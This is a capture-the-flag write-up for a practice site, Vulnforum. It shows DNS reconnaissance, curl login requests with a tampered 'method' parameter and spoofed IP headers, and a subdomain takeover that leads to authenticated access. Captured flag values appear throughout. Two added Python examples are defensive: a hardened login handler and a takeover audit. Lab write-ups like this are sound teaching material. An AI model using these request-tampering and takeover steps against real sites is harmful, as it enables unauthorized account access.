Vulnforum

DNS Recon

 nslookup -type=any vulnforum.co.uk 8.8.8.8
Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnforum.co.uk
Address: 68.183.255.206
vulnforum.co.uk	nameserver = ns1.digitalocean.com.
vulnforum.co.uk	nameserver = ns2.digitalocean.com.
vulnforum.co.uk	nameserver = ns3.digitalocean.com.
vulnforum.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnforum.co.uk
	serial = 1626253208
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800

Authoritative answers can be found from:

 dnsrecon -d vulnforum.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnforum.co.uk
[*] 	 A www.vulnforum.co.uk 68.183.255.206
[+] 1 Records Found

Visual Recon - Browsing the Page

Findings

Playing with Login Parameters

We open our browser's dev console and try to log in using some credentials. It doesn't work, but we copy the login request as a curl command to check it out. Change --data-raw 'username=toby&password=toby&method=local' to --data-raw 'username=toby&password=toby&method=remote'

 curl 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby&method=remote' \
  --compressed \
  --insecure
{"display_msg":"Server Error","technical_msg":"Server \"http:\/\/nqorl3vm.auth.vulnforum.co.uk\/auth\" responded with a 404 error","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

We've got the first flag and an interesting URL: http://nqorl3vm.auth.vulnforum.co.uk/auth
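Two things make the request above pay off: the client gets to pick the authentication backend through the method field, and the failure from the upstream provider is echoed back to the client together with the provider URL. The following is an added example (not code from the writeup or from the target application) of a minimal login dispatcher written both ways. The remote provider is simulated with an in-memory table so it runs offline; the hostnames, user store and response texts are constructed.

```python
import hmac
import logging
from typing import Dict, Tuple

log = logging.getLogger("login")

# Constructed: the provider URL the application is configured to use (hypothetical).
REMOTE_AUTH_URL = "http://tenant1234.auth.vulnforum.example/auth"
# Constructed local user store (plaintext only to keep the example short).
LOCAL_USERS = {"admin": "correct horse battery staple"}


def call_remote_auth(url: str, username: str, password: str) -> int:
    """Simulated remote provider. The configured tenant is not registered there,
    which models the 404 / "Invalid Domain" situation seen in the writeup."""
    unregistered_tenants = {REMOTE_AUTH_URL}
    return 404 if url in unregistered_tenants else 200


def check_local(username: str, password: str) -> bool:
    """Constant-time comparison against the local store."""
    stored = LOCAL_USERS.get(username)
    return stored is not None and hmac.compare_digest(stored.encode(), password.encode())


def vulnerable_login(form: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """Weak design: the backend is chosen by the client and the upstream
    error (including the upstream URL) is returned verbatim."""
    username = form.get("username", "")
    password = form.get("password", "")
    method = form.get("method", "local")          # client-controlled backend choice
    if method == "remote":
        status = call_remote_auth(REMOTE_AUTH_URL, username, password)
        if status != 200:
            return 500, {
                "display_msg": "Server Error",
                "technical_msg": f'Server "{REMOTE_AUTH_URL}" responded with a {status} error',
            }
        return 201, {"display_msg": "Login Successful", "technical_msg": ""}
    if check_local(username, password):
        return 201, {"display_msg": "Login Successful", "technical_msg": ""}
    return 401, {"display_msg": "Invalid credentials", "technical_msg": ""}


def hardened_login(form: Dict[str, str], backend: str = "local") -> Tuple[int, Dict[str, str]]:
    """Hardened: the backend comes from server configuration, a client-supplied
    'method' is logged and ignored, and upstream detail stays in the server log."""
    username = form.get("username", "")
    password = form.get("password", "")
    if "method" in form:
        log.warning("ignoring client-supplied method=%r for user %r", form["method"], username)
    if backend == "remote":
        status = call_remote_auth(REMOTE_AUTH_URL, username, password)
        if status != 200:
            log.error("remote auth %s returned %d", REMOTE_AUTH_URL, status)
            return 503, {"display_msg": "Login temporarily unavailable"}
        return 201, {"display_msg": "Login Successful"}
    if check_local(username, password):
        return 201, {"display_msg": "Login Successful"}
    return 401, {"display_msg": "Invalid credentials"}


if __name__ == "__main__":
    tampered = {"username": "toby", "password": "toby", "method": "remote"}
    print("vulnerable:", vulnerable_login(tampered))
    print("hardened:  ", hardened_login(tampered))
```

The hardened variant also answers the remote-provider failure with a generic 503 rather than a 500 carrying the provider hostname, which is the piece of information the rest of the writeup builds on.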

DNS Recon - Part 2

Let's check our new domain

 dnsrecon -d nqorl3vm.auth.vulnforum.co.uk
[*] Performing General Enumeration of Domain: nqorl3vm.auth.vulnforum.co.uk
[!] Wildcard resolution is enabled on this domain
[!] It is resolving to vulnauth.co.uk
[!] All queries will resolve to this address!!
[-] All nameservers failed to answer the DNSSEC query for nqorl3vm.auth.vulnforum.co.uk
[*] 	 SOA ns1.digitalocean.com 173.245.58.51
[*] 	 NS ns1.digitalocean.com 173.245.58.51
[*] 	 Bind Version for 173.245.58.51 b'Salt-master'
[*] 	 NS ns1.digitalocean.com 2400:cb00:2049:1::adf5:3a33
[*] 	 NS ns3.digitalocean.com 198.41.222.173
[*] 	 Bind Version for 198.41.222.173 b'Salt-master'
[*] 	 NS ns3.digitalocean.com 2400:cb00:2049:1::c629:dead
[*] 	 NS ns2.digitalocean.com 173.245.59.41
[*] 	 Bind Version for 173.245.59.41 b'Salt-master'
[*] 	 NS ns2.digitalocean.com 2400:cb00:2049:1::adf5:3b29
[-] Could not Resolve MX Records for nqorl3vm.auth.vulnforum.co.uk
[*] 	 CNAME nqorl3vm.auth.vulnforum.co.uk vulnauth.co.uk
[*] 	 A vulnauth.co.uk 68.183.255.206
[*] Enumerating SRV Records
[-] No SRV Records Found for nqorl3vm.auth.vulnforum.co.uk
[+] 0 Records Found

We found yet another new domain: vulnauth.co.uk. Let's verify whether it's live.

 curl -L -ik -H "Cookie: ctfchallenge=CENSORED" http://vulnauth.co.uk
HTTP/1.1 200 OK
server: nginx/1.21.1
date: Fri, 13 May 2022 14:16:44 GMT
content-type: text/html; charset=UTF-8
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnauth.co.uk
transfer-encoding: chunked

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>VulnAuth - Authorisation Provider</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">

    <div style="text-align: center">
        <h1>VulnAuth</h1>
        <h4>User Authentication</h4>
        <img src="/images/logo.jpg">
    </div>

    <div class="row" style="margin-top:20px">

        <div class="col-md-5 col-md-offset-1">
            <h3>What is VulnAuth?</h3>
            <p>VulnAuth is a whitelabel solution to all your user authentication needs.</p>
            <p>We handle your user logins to you don't need to store any passwords on your systems.</p>
            <p>You can even use your existing domain name just by setting up a CNAME record to vulnauth.co.uk for example <strong>auth.yourdomain.com</strong></p>
            <p><strong>[^FLAG^A959EBEC1D9A02A456FC5BCCF7BA8D91^FLAG^]</strong></p>	
	</div>

We found another flag!

Subdomain Takeover

We previously found http://nqorl3vm.auth.vulnforum.co.uk/auth, which tells us "Invalid Domain" when visiting the page. With the information we gathered in the previous step, it's a good idea to try to register that domain :)

Visit: http://vulnauth.co.uk/ and create an account

Auth Domain: nqorl3vm.auth.vulnforum.co.uk
E-Mail Address: toby@toby.com
Password: toby123

Visit: http://nqorl3vm.auth.vulnforum.co.uk (you should be greeted with a login page) and create a new user using the UUID we've discovered previously (1ac9c036aaf12a755084dc6a326ed7f5)

Username: toby
UUID: 1ac9c036aaf12a755084dc6a326ed7f5
Password: toby123

Let's try to log in using curl

 curl -ik -L 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby123&method=remote' \
  --compressed \
  --insecure
HTTP/1.1 201 Created
server: nginx/1.21.1
date: Fri, 13 May 2022 14:10:48 GMT
content-type: application/json
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnforum.co.uk
set-cookie: token=NmNiMGJkOTNiY2JkNmIxYzQ1YjRlYjIwMGViNWQzYzZiN2UwZDQ4NGQyM2U5ZGZhNTFkYzY3MDI2ZDllNDdmYTdlNjJhMTExNzcyYTVkYjBkMjc2MDhmNGMxZDJjOTk1OGU0NmRhNGFkOGFiZTU4M2FkMDAzNzNiNWVjNDVjMWE%3D; expires=Fri, 13-May-2022 15:10:48 GMT; Max-Age=3600; path=/
transfer-encoding: chunked

{"display_msg":"Login Successful","technical_msg":"","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

Great, it worked!
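The takeover works because a wildcard CNAME under auth.vulnforum.co.uk hands every name in that subtree to a provider where tenant hostnames are self-service claimable, and the application trusts one of those names as its login backend. From the owning side, this is an asset-inventory problem: every CNAME chain that terminates at such a provider must end at a tenant the organisation actually registered. The following is an added example (not from the writeup) of that check. DNS and HTTP are simulated with constructed tables so it runs offline; in practice the two lookup functions would be replaced by real resolver and HTTP calls. The provider list and the "Invalid Domain" body fingerprint mirror the writeup's observations, while all hostnames and addresses are constructed.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed zone data: name -> (rtype, target). A "*." key stands in for a wildcard record.
ZONE: Dict[str, Tuple[str, str]] = {
    "www.vulnforum.example":     ("A", "192.0.2.10"),
    "*.auth.vulnforum.example":  ("CNAME", "vulnauth.example."),   # wildcard delegation to the provider
    "api.vulnforum.example":     ("CNAME", "lb.vulnforum.example."),
    "lb.vulnforum.example":      ("A", "192.0.2.11"),
    "vulnauth.example":          ("A", "192.0.2.20"),
}

# Constructed: providers whose tenant hostnames anyone can claim, with the
# response-body fingerprint they show for a tenant nobody has registered.
CLAIMABLE_PROVIDERS: Dict[str, str] = {
    "vulnauth.example": "Invalid Domain",
}

# Constructed HTTP responses, keyed by the Host header sent.
HTTP_BODIES: Dict[str, str] = {
    "nqorl3vm.auth.vulnforum.example": "<h1>Invalid Domain</h1>",     # unregistered tenant
    "portal.auth.vulnforum.example":   "<title>Tenant login</title>", # registered tenant
}


def lookup(name: str) -> Optional[Tuple[str, str]]:
    """Simulated resolver: exact record first, then a wildcard one level up."""
    if name in ZONE:
        return ZONE[name]
    parent = name.split(".", 1)[1] if "." in name else ""
    return ZONE.get("*." + parent)


def cname_chain(name: str, max_hops: int = 8) -> List[str]:
    """Follow CNAMEs from name and return every hostname visited, in order."""
    chain = [name]
    current = name
    for _ in range(max_hops):
        rec = lookup(current)
        if rec is None or rec[0] != "CNAME":
            break
        current = rec[1].rstrip(".")
        if current in chain:        # CNAME loop
            break
        chain.append(current)
    return chain


def fetch_body(host: str) -> str:
    """Simulated HTTP GET with the given Host header."""
    return HTTP_BODIES.get(host, "")


def assess(name: str) -> Dict[str, object]:
    """Classify one hostname: 'none' (no claimable provider in the chain),
    'delegated' (provider, tenant registered) or 'takeover' (provider, tenant unclaimed)."""
    chain = cname_chain(name)
    terminal = chain[-1]
    provider = next(
        (p for p in CLAIMABLE_PROVIDERS if terminal == p or terminal.endswith("." + p)),
        None,
    )
    if provider is None:
        return {"host": name, "risk": "none", "chain": chain}
    unclaimed = CLAIMABLE_PROVIDERS[provider] in fetch_body(name)
    return {
        "host": name,
        "risk": "takeover" if unclaimed else "delegated",
        "chain": chain,
        "provider": provider,
    }


def audit(hosts: Iterable[str]) -> Dict[str, str]:
    """Risk verdict per hostname, for the names an application is configured to trust."""
    return {h: str(assess(h)["risk"]) for h in hosts}


if __name__ == "__main__":
    for host, risk in audit([
        "nqorl3vm.auth.vulnforum.example",
        "portal.auth.vulnforum.example",
        "api.vulnforum.example",
    ]).items():
        print(f"{risk:10} {host}")
```

The input to audit() should be the list of hostnames the application is configured to trust (the remote auth URL from the error message, for instance), not only the names that appear as explicit records, since a wildcard record means names that were never deliberately created still resolve.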

Visual Recon - Browsing the Page - As User: Toby

Unfortunately we aren't able to log in on the webpage itself, because "method=local" is hardcoded there. Let's use the cookie we generated earlier and import it into our browser.

Great! We're logged in as toby and find another flag [^FLAG^3B1A170C3033B788FEB1B1A4E45D62CD^FLAG^]

Findings

Visit: http://www.vulnforum.co.uk/settings. We reset the password to toby123 and are now able to log in without any problems.
